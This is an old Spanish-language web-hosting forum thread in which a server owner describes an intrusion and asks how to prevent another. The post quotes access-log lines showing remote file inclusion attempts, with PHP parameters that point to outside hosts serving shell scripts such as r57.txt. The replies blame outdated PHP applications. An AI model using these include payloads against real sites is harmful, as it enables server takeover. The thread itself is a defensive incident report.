Retroceder   Foros del Web > Administración de sitios web > Web Hosting > Servidores Dedicados, VPS y colocación

Respuesta
 
Herramientas Desplegado
Antiguo 02-sep-2007, 12:03   #1 (permalink)
Anarko está en el buen camino
 
Fecha de Ingreso: febrero-2004
Mensajes: 1.121
Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder?

Hola,

hace semanas NO entraba a mi cPanel...

Accedi al PhpMyAdmin para ver unas cosas...

Oh carambas!!, tengo IP dedicada para la conección!.

Al acceder al cPanel veo que alguien ha agregado una IP a las conexiones REMOTAS de MySQL...

Busco en los LOGS de acceso y descubro que esa IP ha intentado acceder a mi web con vars como:
Código PHP:
coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http:  flackster.org photos myadmin temp ., ., ., r57.txt?

hosting  coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http:  flackster.org photos myadmin temp ., ., ., r57.txt?

/
phpPgAdmin/sqledit.php?server=http://members.lycos.nl/pspmusicfeed/id.txt?

/include/main.php?config[search_disp]=true&include_dir=http://usuarios.arnet.com.ar/larry123/safe.txt?

Etc... 
La IP es de KOREA...

Ademas os digo:

Núnca agrego Conex remotas a MySQL... (Y tengo IP FIJA para Internet)...

Es un BUG de PhpMyAdmin?
Es un BUG de cPanel?
Con exploits a PHP pueden haber agregado ESA IP a mi sistema ?

Que pesadilla!!!....
__________________
Salu2!,
Microsoft utiliza PHP, yo no lo sabia tu?
Anarko está desconectado   Responder Citando
Antiguo 03-sep-2007, 03:13   #2 (permalink)
cincinnati está en el buen camino
 
Fecha de Ingreso: noviembre-2002
Ubicación: S
Mensajes: 647
Re: Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder?

Cita:
Con exploits a PHP pueden haber agregado ESA IP a mi sistema
Sí, por supuesto. Explotando agujeros de php (tipo joomlas obsoletos, phpbb, oscommerce, etc, etc) no es muy complicado para un hacker acceder a tu sistema y hacer lo que quiera.
__________________
Santoral de hoy: San Petronio (creo)
cincinnati está desconectado   Responder Citando
Antiguo 03-sep-2007, 04:12   #3 (permalink)
rcalle66 sólo puede mejorar
 
Fecha de Ingreso: agosto-2007
Mensajes: 668
Re: Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder?

Me sucedio hace algún tiempo y fue por un módulo de joomla llamado ext_calendar; pero ellos no accedieron a mi cpanel y en tu caso al parecer si;
rcalle66 está desconectado   Responder Citando
Respuesta

No hay votos aún.


Herramientas
Desplegado

Normas de Publicación
No puedes crear nuevos temas
No puedes responder temas
No puedes subir archivos adjuntos
No puedes editar tus mensajes

BB code is Activado
Caritas están Activado
[IMG] está Activado
Código HTML está Desactivado


La Zona horaria es GMT -6. Ahora son las 09:30.


Message Board Statistics

LinkBacks Enabled by vBSEO 3.1.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93